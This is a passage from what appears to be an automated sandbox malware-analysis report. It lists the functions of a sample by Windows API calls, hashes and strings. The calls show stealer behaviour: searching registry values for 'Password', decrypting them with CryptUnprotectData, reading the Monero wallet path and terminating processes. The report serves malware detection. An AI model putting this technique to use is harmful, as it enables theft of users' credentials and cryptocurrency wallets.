                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006C6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 006C6C10
                                • InternetCloseHandle.WININET(00000000), ref: 006C6C17
                                • InternetCloseHandle.WININET(?), ref: 006C6C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 741f29b3f7734cd203f32dadfd774a372d680b28596a07dc600bdc1e42f8ed76
                                • Instruction ID: 8e3b211edb719d6e983501651b98d3bc4f70903be81a22d1d3e2f77ed5eef046
                                • Opcode Fuzzy Hash: 741f29b3f7734cd203f32dadfd774a372d680b28596a07dc600bdc1e42f8ed76
                                • Instruction Fuzzy Hash: 24415CB5A00205ABDB24DB64DC89FBE77B9FB44701F104558FA05E7280EF70AE41CBA8
                                Function 006E4500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,006D4F39), ref: 006E4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E454C
                                • wsprintfW.USER32 ref: 006E455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006E45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006E45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 006E45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9Om$%hs$9Om
                                • API String ID: 885711575-4198278319
                                • Opcode ID: 58674aea9afab97efe1bf8131b2a1aa83a42b24fb1c5b8b0ba9aebf8e7517f87
                                • Instruction ID: 89f8d16e51faa120ac881866f26c61597c9799853046a17205e98ce0f2899b22
                                • Opcode Fuzzy Hash: 58674aea9afab97efe1bf8131b2a1aa83a42b24fb1c5b8b0ba9aebf8e7517f87
                                • Instruction Fuzzy Hash: B6311872A01209ABDB20DBB5DC49FEEB779FB84700F104159FA05A6180EF70AA41CBA5
                                Function 006CBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CBC1F
                                • lstrlen.KERNEL32(00000000), ref: 006CBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CBCAC
                                • lstrlen.KERNEL32(006F4AD4), ref: 006CBD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: b8e0b458fb38b249e73ced7b20a34d93ed8565f5a60afcbe381bb23313f85880
                                • Instruction ID: 0d8118021f0f9f4408ac2b101fad0d433459af284286a5316da1c244d821e9b9
                                • Opcode Fuzzy Hash: b8e0b458fb38b249e73ced7b20a34d93ed8565f5a60afcbe381bb23313f85880
                                • Instruction Fuzzy Hash: 06A13870A012068BCB65DB69D94AFBAB7B2FF44305F18906DE80ADB361DB35DC41CB94
                                Function 006E5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 006E6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 006E609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: 54adcdd8b92fa7efe847d929210ecd5220548fbcf116f245b7d6f7b8d2a99275
                                • Instruction ID: 3be80e00bffd1bfb6ce2063abaf247f9faede05efb359d4af4bd29825e1513f2
                                • Opcode Fuzzy Hash: 54adcdd8b92fa7efe847d929210ecd5220548fbcf116f245b7d6f7b8d2a99275
                                • Instruction Fuzzy Hash: F961BD70712784DBDB28CF5EC98096EB3B7EF94308B244A49F4828B781D730AD818B95
                                Function 006DE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE07D
                                • lstrcat.KERNEL32(?,?), ref: 006DE098
                                • lstrcat.KERNEL32(?,?), ref: 006DE0AC
                                • lstrcat.KERNEL32(?,00F0A6D8), ref: 006DE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006DE0D4
                                • lstrcat.KERNEL32(?,00F1F4C0), ref: 006DE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006DE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 1cfface50f85d898388a23cfc0cc808bac216ee9417f8105d8e67af787f7291f
                                • Instruction ID: 976d2c79e08215567e3b35e91607ec9dbd3dd0869a91c300b7c50335ce4c7397
                                • Opcode Fuzzy Hash: 1cfface50f85d898388a23cfc0cc808bac216ee9417f8105d8e67af787f7291f
                                • Instruction Fuzzy Hash: 37414771D10128ABCB65EBA4DC59BED73B6FF88300F1049A9F94A97351DF309E858B90
                                Function 006C7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006C7805
                                  • Part of subcall function 006C77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006C784A
                                  • Part of subcall function 006C77D0: StrStrA.SHLWAPI(?,Password), ref: 006C78B8
                                  • Part of subcall function 006C77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006C78EC
                                  • Part of subcall function 006C77D0: HeapFree.KERNEL32(00000000), ref: 006C78F3
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006C7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 006C7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 006C7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 006C7AF0
                                • wsprintfA.USER32 ref: 006C7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C7B47
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006C7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: db30b32a72e4f86cb3b29ea877a115023e5fb3dfdbc9aca62feca789c0b95ba3
                                • Instruction ID: 272d32e5298bdfcc32e4ce20765d90dce33c9d18f7666416ca57dc5ad2e4f6d7
                                • Opcode Fuzzy Hash: db30b32a72e4f86cb3b29ea877a115023e5fb3dfdbc9aca62feca789c0b95ba3
                                • Instruction Fuzzy Hash: 18314C72A14618EFCB10DFA8DC48EBAB77AFB84710B15451DE94A93310DF70AD41CBA0
                                Function 006D81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8243
                                • lstrlen.KERNEL32(00000000), ref: 006D8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8297
                                • lstrlen.KERNEL32(00000000), ref: 006D82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D82EB
                                • lstrlen.KERNEL32(00000000), ref: 006D8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8337
                                • lstrlen.KERNEL32(00000000), ref: 006D8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: e2158c25f5c403be0d119ae286f8e242bab38f9e553e44790495d721684d1acc
                                • Instruction ID: ef3b51ee6a8332c5709b8cbd614834b40da6e35974d0c2bba441daee19d79bcb
                                • Opcode Fuzzy Hash: e2158c25f5c403be0d119ae286f8e242bab38f9e553e44790495d721684d1acc
                                • Instruction Fuzzy Hash: F4514B759016129FDB14EFB9D858BAAB7AAFF44700F124529AD0ADB344DF30E950CBE0
                                Function 006C77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006C7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006C784A
                                • StrStrA.SHLWAPI(?,Password), ref: 006C78B8
                                  • Part of subcall function 006C7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 006C775E
                                  • Part of subcall function 006C7750: RtlAllocateHeap.NTDLL(00000000), ref: 006C7765
                                  • Part of subcall function 006C7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006C778D
                                  • Part of subcall function 006C7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006C77AD
                                  • Part of subcall function 006C7750: LocalFree.KERNEL32(?), ref: 006C77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006C78EC
                                • HeapFree.KERNEL32(00000000), ref: 006C78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 006C7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: fe7f1dda44dc1758745a5194dcff31558907afc03d63a272d1ff4340444a5a2b
                                • Instruction ID: a5feb405a7b9083d227705c20c0580bdeb4a664a41cb142a39ee09ead60060ba
                                • Opcode Fuzzy Hash: fe7f1dda44dc1758745a5194dcff31558907afc03d63a272d1ff4340444a5a2b
                                • Instruction Fuzzy Hash: 5C711DB1D0021D9FDB50DF95DC81EEEBBB9EF49300F1045AAE609A7240EA315A85CFA5
                                Function 006C1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006C1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006C1173
                                • RegCloseKey.ADVAPI32(?), ref: 006C117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 006C114F
                                • wallet_path, xrefs: 006C116D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: a8bc5cfd7654f858fb151c46ce307e50c853c0052077235c072d7c8044d2a051
                                • Instruction ID: c21077c1376ff51bf40720c10a1e2419abda74f63345fa6ed97638ffba2aedc8
                                • Opcode Fuzzy Hash: a8bc5cfd7654f858fb151c46ce307e50c853c0052077235c072d7c8044d2a051
